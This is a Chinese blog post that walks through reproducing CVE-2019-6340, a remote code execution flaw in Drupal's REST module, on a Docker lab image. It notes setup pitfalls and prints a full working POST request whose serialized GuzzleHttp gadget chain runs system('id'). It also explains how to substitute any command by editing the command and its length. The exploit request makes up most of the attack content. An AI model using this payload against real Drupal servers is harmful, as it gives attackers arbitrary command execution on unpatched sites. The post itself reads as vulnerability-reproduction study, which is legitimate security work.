首页 博客列表 精选博客 每日焦点 关于我
Drupal RCE(CVE-2019-6340)复现踩坑
发布日期:2021-05-15 22:43:28 浏览次数:26 分类:精选文章

本文共 1658 字,大约阅读时间需要 5 分钟。

CVE-2019-6340 影响范围:Drupal < 8.6.10,Drupal < 8.5.12

1、搜索镜像

docker search cve-2019-6340
2、拉取
docker pull knqyf263/cve-2019-6340
3、运行
docker run -d -t -p 80:80 knqyf263/cve-2019-6340
4、访问url:http://174.99.8.203/node/1
在这里插入图片描述
5、抓取数据包并修改
在这里插入图片描述
注意三点:
A、POST /node/?_format=hal_json
B、Content-Type: application/hal+json
C、/rest/type/shortcut/default

本次复现踩坑。

POST /drupal8.x/node/?_format=hal_json
/drupal/rest/type/shortcut/default
Content-Type: application/x-www-form-urlencoded

6、命令修改,修改s:2:“id”;id为执行的命令,2为命令长度。

POST /node/?_format=hal_json HTTP/1.1Host: 174.99.8.203Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://174.99.8.203/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/hal+jsonContent-Length: 630{     "link": [    {         "value": "link",      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"    }  ],  "_links": {       "type": {         "href":"http://174.99.8.203/rest/type/shortcut/default"    }  }}

7、成功执行

在这里插入图片描述

上一篇:CVE-2019-15107 复现(Webmin)
下一篇:基于Chrome_driver 的百度关键字检索工具

发表评论

最新留言

路过按个爪印,很不错,赞一个!
[***.219.124.196]2025年05月02日 06时43分23秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

Thymeleaf 生成下标,索引,使用Stat变量 2021-05-16
LINK : fatal error LNK1123: 转换到 COFF 期间失败: 文件无效或损坏 2021-05-16
全局变量初始化顺序的不确定性引发的bug 2021-05-16
【C++11】std::function和std::bind 2021-05-16
java基础避坑(二)——基础数据类型short 2021-05-16
Hyper ledger Caliper官方文档【中文版】 2021-05-16
EOS交易离线签名PHP代码 2021-05-16
rx580和gtx1060区别大不大选哪个 2021-05-16
i7 9750h和r5 3550h 哪个好 2021-05-16
机械革命z3pro和x8pro 有什么区别 哪个好详细配置对比 2021-05-16
i9 11900H和i7 10875h 选哪个 2021-05-16
java工程实现简单Storm--统计字符串频率 2021-05-16
笔记本Window10系统开热点详细步骤 2021-05-16
Windows7系统使用adb remount工具Andorid问题分析 2021-05-16
Ubuntu文件校验MD5 2021-05-16
windows环境tomcat8配置Solr5.5.1 2021-05-16
SpringMVC Hello World 2021-05-16
ValueError: Unexpected end of file. 2021-05-16
vue-组件传值方式-非父子组件传值解决方案-js版 2021-05-16
CentOS 7-tomcat的安装姿势 2021-05-16
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 461351306 位访客
访问时间: 2025-05-07 10:33:47 访问IP: 18.188.15.246     Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1 手机版